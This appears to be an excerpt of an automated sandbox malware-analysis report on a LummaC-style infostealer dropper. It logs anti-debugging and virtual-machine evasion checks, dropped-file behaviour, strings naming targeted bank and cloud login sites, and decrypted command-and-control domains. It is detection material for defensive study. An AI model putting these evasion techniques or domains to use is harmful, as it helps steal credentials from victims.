Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	RDTSC instruction interceptor: First address: A42591 second address: A42595 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	RDTSC instruction interceptor: First address: A417D9 second address: A417E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	RDTSC instruction interceptor: First address: A41973 second address: A41979 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	RDTSC instruction interceptor: First address: A41979 second address: A4197D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	RDTSC instruction interceptor: First address: A4197D second address: A41998 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F88FCAE42A2h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	RDTSC instruction interceptor: First address: A41F17 second address: A41F1D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	RDTSC instruction interceptor: First address: A41F1D second address: A41F23 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	RDTSC instruction interceptor: First address: A41F23 second address: A41F27 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	RDTSC instruction interceptor: First address: A41F27 second address: A41F2D instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	RDTSC instruction interceptor: First address: A42083 second address: A420BD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F88FCB145D8h 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F88FCB145D8h 0x0000000e js 00007F88FCB145C6h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	RDTSC instruction interceptor: First address: A4BDD5 second address: A4BDE6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 ja 00007F88FCAE4296h 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	RDTSC instruction interceptor: First address: A4BDE6 second address: A4BDEC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	RDTSC instruction interceptor: First address: A4BDEC second address: A4BE06 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F88FCAE42A2h 0x00000007 push eax 0x00000008 push edx 0x00000009 push edi 0x0000000a pop edi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	RDTSC instruction interceptor: First address: A4BE06 second address: A4BE0A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	RDTSC instruction interceptor: First address: A4DAA1 second address: A4DAA6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	RDTSC instruction interceptor: First address: A4D5A6 second address: A4D5BE instructions: 0x00000000 rdtsc 0x00000002 jo 00007F88FCB145C6h 0x00000008 jmp 00007F88FCB145CEh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	RDTSC instruction interceptor: First address: A4D5BE second address: A4D5D2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F88FCAE429Eh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	RDTSC instruction interceptor: First address: A4D5D2 second address: A4D5D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	RDTSC instruction interceptor: First address: A4F63E second address: A4F649 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F88FCAE4296h 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	RDTSC instruction interceptor: First address: 91B31B second address: 91B320 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	RDTSC instruction interceptor: First address: A453F8 second address: A45440 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F88FCAE42A2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F88FCAE42A4h 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F88FCAE42A7h 0x00000016 push edi 0x00000017 push edi 0x00000018 pop edi 0x00000019 pop edi 0x0000001a rdtsc
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	RDTSC instruction interceptor: First address: A45440 second address: A45450 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007F88FCB145C6h 0x0000000a jo 00007F88FCB145C6h 0x00000010 rdtsc

Tries to evade debugger and weak emulator (self modifying code)

Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	Special instruction interceptor: First address: 7B9CB3 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	Special instruction interceptor: First address: 959A80 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	Special instruction interceptor: First address: 959743 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	Special instruction interceptor: First address: 9818FF instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	Special instruction interceptor: First address: 963A53 instructions caused by: Self-modifying code

Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	Memory allocated: 5020000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	Memory allocated: 5310000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	Memory allocated: 7310000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc	Jump to behavior
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion	Jump to behavior
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion	Jump to behavior

Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com

API coverage: 3.9 %

Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe TID: 2616	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com TID: 5456	Thread sleep time: -150000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com TID: 6528	Thread sleep time: -30000s >= -30000s	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\AppData\Local\Temp\Set-up.exe

File Volume queried: C:\ FullSizeInformation

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exe	Code function: 2_2_00406301 FindFirstFileW,FindClose,	2_2_00406301
Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exe	Code function: 2_2_00406CC7 DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,	2_2_00406CC7
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Code function: 14_2_004EDC54 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	14_2_004EDC54
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Code function: 14_2_004FA087 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	14_2_004FA087
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Code function: 14_2_004FA1E2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	14_2_004FA1E2
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Code function: 14_2_004EE472 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,	14_2_004EE472
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Code function: 14_2_004FA570 FindFirstFileW,Sleep,FindNextFileW,FindClose,	14_2_004FA570
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Code function: 14_2_004BC622 FindFirstFileExW,	14_2_004BC622
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Code function: 14_2_004F66DC FindFirstFileW,FindNextFileW,FindClose,	14_2_004F66DC
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Code function: 14_2_004F7333 FindFirstFileW,FindClose,	14_2_004F7333
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Code function: 14_2_004F73D4 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,	14_2_004F73D4
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Code function: 14_2_004ED921 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	14_2_004ED921

Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com

Code function: 14_2_00485FC8 GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

14_2_00485FC8

Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Temp\768400	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Temp\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Temp\768400\	Jump to behavior

Source: ZTM2pfyhu3.exe, ZTM2pfyhu3.exe, 00000000.00000002.2142862831.000000000093B000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: Climb.com, 0000000E.00000003.2397912752.00000000041F7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: Climb.com, 0000000E.00000003.2397912752.00000000041F7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696428655f
Source: Climb.com, 0000000E.00000003.2397912752.00000000041F7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: Climb.com, 0000000E.00000003.2397912752.00000000041F7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: Climb.com, 0000000E.00000002.2525259891.00000000018B9000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWp
Source: Climb.com, 0000000E.00000003.2397912752.00000000041F7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696428655
Source: Climb.com, 0000000E.00000003.2397912752.00000000041FC000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: - GDCDYNVMware20,11696428655p
Source: Climb.com, 0000000E.00000003.2397912752.00000000041F7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: Set-up.exe, 00000003.00000003.2349004763.0000000001047000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000003.00000003.2348806436.000000000103B000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000003.00000003.2348834892.0000000001044000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000003.00000003.2349168343.000000000104A000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000003.00000002.2350553252.000000000104B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQH\/2wBDAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQH\/wAARCAQABQADASIAAhEBAxEB\/8QAHwAAAQUBAQEBAQEAAAAAAAAAAAECAwQFBgcICQoL\/8QAtRAAAgEDAwIEAwUFBAQAAAF9AQIDAAQRBRIhMUEGE1FhByJxFDKBkaEII0KxwRVS0fAkM2JyggkKFhcYGRolJicoKSo0NTY3ODk6Q0RFRkdISUpTVFVWV1hZWmNkZWZnaGlqc3R1dnd4eXqDhIWGh4iJipKTlJWWl5iZmqKjpKWmp6ipqrKztLW2t7i5usLDxMXGx8jJytLT1NXW19jZ2uHik{
Source: Set-up.exe, Climb.com, 0000000E.00000003.2524302812.00000000042C1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: ZTM2pfyhu3.exe, ZTM2pfyhu3.exe, 00000000.00000003.2101045383.00000000050D0000.00000004.00001000.00020000.00000000.sdmp, ZTM2pfyhu3.exe, 00000000.00000002.2141937382.0000000000022000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: DetectVirtualMachine
Source: Set-up.exe.0.dr	Binary or memory string: SYSINTERNALSNum_processorNum_ramnameallfreedriversNum_displaysresolution_xresolution_y\recent_filesprocessesuptime_minutesC:\Windows\System32\VBox.dll01vbox_firstSYSTEM\ControlSet001\Services\VBoxSFvbox_secondC:\USERS\PUBLIC\public_checkWINDBG.EXEdbgwireshark.exeprocmon.exex64dbg.exeida.exedbg_secdbg_thirdyadroinstalled_appsSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallSOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall%d%s\%sDisplayNameapp_nameindexCreateToolhelp32Snapshot failed.
Source: Set-up.exe, 00000003.00000003.2137555951.0000000000EA7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Y\MACHINE\SYSTEM\ControlSet001\Services\VBoxSFsion\Uninstall\{90160000-008C-0000-0000-0000000FF1CE}00000FF1CE}\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-008C-0000-0000-0000000FF1CE}
Source: Climb.com, 0000000E.00000003.2397912752.00000000041F7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: Climb.com, 0000000E.00000003.2397912752.00000000041F7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: Climb.com, 0000000E.00000003.2397912752.00000000041F7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: Climb.com, 0000000E.00000003.2397912752.00000000041F7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696428655\|UE
Source: Climb.com, 0000000E.00000003.2397912752.00000000041F7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: Climb.com, 0000000E.00000003.2397912752.00000000041F7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: Climb.com, 0000000E.00000003.2397912752.00000000041F7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: Climb.com, 0000000E.00000003.2397912752.00000000041F7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: Climb.com, 0000000E.00000003.2397912752.00000000041F7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: ZTM2pfyhu3.exe, 00000000.00000002.2144782533.000000000122D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\yi
Source: Climb.com, 0000000E.00000003.2397912752.00000000041F7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: Climb.com, 0000000E.00000003.2397912752.00000000041F7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696428655s
Source: Climb.com, 0000000E.00000003.2397912752.00000000041F7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: Climb.com, 0000000E.00000003.2397912752.00000000041F7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: Set-up.exe.0.dr	Binary or memory string: SYSTEM\ControlSet001\Services\VBoxSF
Source: Climb.com, 0000000E.00000003.2397912752.00000000041F7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696428655
Source: Climb.com, 0000000E.00000003.2397912752.00000000041F7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696428655o
Source: ZTM2pfyhu3.exe, 00000000.00000002.2141937382.0000000000022000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: vmware
Source: Climb.com, 0000000E.00000003.2397912752.00000000041F7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: Climb.com, 0000000E.00000003.2397912752.00000000041F7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: Climb.com, 0000000E.00000003.2397912752.00000000041F7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: Climb.com, 0000000E.00000003.2397912752.00000000041F7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: Climb.com, 0000000E.00000003.2397912752.00000000041F7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696428655j
Source: Climb.com, 0000000E.00000003.2397912752.00000000041F7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: Climb.com, 0000000E.00000003.2397912752.00000000041FC000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: YNVMware
Source: PasoCattle.exe, 00000002.00000002.2114291531.000000000052E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECXVUWar&Prod_VMware_SATA_CD00#
Source: Climb.com, 0000000E.00000003.2397912752.00000000041F7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: ZTM2pfyhu3.exe, 00000000.00000003.2101045383.00000000050D0000.00000004.00001000.00020000.00000000.sdmp, ZTM2pfyhu3.exe, 00000000.00000002.2141937382.0000000000022000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: <Module>laddad.exeProgramStubWriterRunnerRunTimeAntiAntismscorlibSystemObjectdelaydelayTimeantiVMantiSandboxantiDebugantiEmulatorenablePersistenceenableFakeErrorencryptTypecompressedcversSystem.Collections.GenericList`1fileNamesfileTypesfileRunTypesfileDropPathsMainDecompressEncryptOrDecryptXORDecryptEncryptInitalizeIEnumerable`1EncryptOutputSwapGetResourceRunOnStartup.ctorWriteAllBytesExecuteDetectVirtualMachineGetModuleHandleDetectSandboxieCheckRemoteDebuggerPresentDetectDebuggerCheckEmulatordatatextkeysijfileregNameAppPathHidefileBytesfinalPathpathrunTypelpModuleNamehProcessisDebuggerPresentSystem.ReflectionAssemblyTitleAttributeAssemblyDescriptionAttributeAssemblyCompanyAttributeAssemblyProductAttributeAssemblyCopyrightAttributeAssemblyTrademarkAttributeAssemblyFileVersionAttributeAssemblyVersionAttributeSystem.Runtime.InteropServicesComVisibleAttributeGuidAttributeSystem.Runtime.CompilerServicesCompilationRelaxationsAttributeRuntimeCompatibilityAttributeladdadEnvironmentExitSystem.ThreadingThreadSleepget_ItemStringop_EqualitySystem.TextEncodingget_UnicodeGetBytesConcatSystem.IOPathCombineget_CountMemoryStreamSystem.IO.CompressionDeflateStreamStreamCompressionModeCopyToIDisposableDisposeToArrayByteSystem.CoreSystem.LinqEnumerable<EncryptInitalize>b__0Func`2CS$<>9__CachedAnonymousMethodDelegate1CompilerGeneratedAttributeRangeSelect<>c__DisplayClass3<EncryptOutput>b__2bAssemblyGetExecutingAssemblySystem.ResourcesResourceManagerGetObjectAppDomainget_CurrentDomainget_FriendlyNameFileExistsGetEntryAssemblyget_Locationop_InequalityCopyFileAttributesGetAttributesSetAttributesMicrosoft.Win32RegistryRegistryKeyLocalMachineget_UTF8GetStringOpenSubKeySetValueCurrentUserException.cctorConvertFromBase64StringAddGetTempPathSystem.DiagnosticsProcessProcessStartInfoget_StartInfoset_FileNameStartSystem.ManagementManagementObjectSearcherManagementObjectCollectionGetManagementObjectEnumeratorGetEnumeratorManagementBaseObjectget_CurrentToStringToLowerToUpperInvariantContainsMoveNextDllImportAttributekernel32.dllIntPtrToInt32GetCurrentProcessget_HandleDateTimeget_Nowget_Ticksin1jhvfotsq.resources
Source: Climb.com, 0000000E.00000003.2397912752.00000000041F7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696428655x
Source: ZTM2pfyhu3.exe, 00000000.00000002.2142862831.000000000093B000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: Climb.com, 0000000E.00000003.2397912752.00000000041F7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
Source: Climb.com, 0000000E.00000003.2397912752.00000000041F7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655

Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe

System information queried: ModuleInformation

Jump to behavior

Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Hides threads from debuggers

Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe

Thread information set: HideFromDebugger

Jump to behavior

Tries to detect sandboxes and other dynamic analysis tools (window names)

Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	Open window title or class name: regmonclass
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	Open window title or class name: gbdyllo
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	Open window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	Open window title or class name: ollydbg
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	Open window title or class name: filemonclass
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	Open window title or class name: file monitor - sysinternals: www.sysinternals.com

Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	File opened: NTICE
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	File opened: SICE
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	File opened: SIWVID

Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	Process queried: DebugPort	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com

Code function: 14_2_004FF4FF BlockInput,

14_2_004FF4FF

Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com

Code function: 14_2_0048338B GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

14_2_0048338B

Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exe

Code function: 2_2_00406328 GetModuleHandleA,LoadLibraryA,GetProcAddress,

2_2_00406328

Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com

Code function: 14_2_004A5058 mov eax, dword ptr fs:[00000030h]

14_2_004A5058

Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com

Code function: 14_2_004E20AA GetLengthSid,GetProcessHeap,HeapAlloc,CopySid,GetProcessHeap,HeapFree,

14_2_004E20AA

Source: C:\Windows\SysWOW64\tasklist.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Process token adjusted: Debug			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Code function: 14_2_004B2992 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	14_2_004B2992
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Code function: 14_2_004A0BAF IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	14_2_004A0BAF
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Code function: 14_2_004A0D45 SetUnhandledExceptionFilter,	14_2_004A0D45
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Code function: 14_2_004A0F91 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	14_2_004A0F91

Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

LummaC encrypted strings found

Source: Climb.com, 0000000E.00000002.2525259891.00000000018B9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: hummskitnj.buzz
Source: Climb.com, 0000000E.00000002.2525259891.00000000018B9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: cashfuzysao.buzz
Source: Climb.com, 0000000E.00000002.2525259891.00000000018B9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: appliacnesot.buzz
Source: Climb.com, 0000000E.00000002.2525259891.00000000018B9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: screwamusresz.buzz
Source: Climb.com, 0000000E.00000002.2525259891.00000000018B9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: inherineau.buzz
Source: Climb.com, 0000000E.00000002.2525259891.00000000018B9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: scentniej.buzz
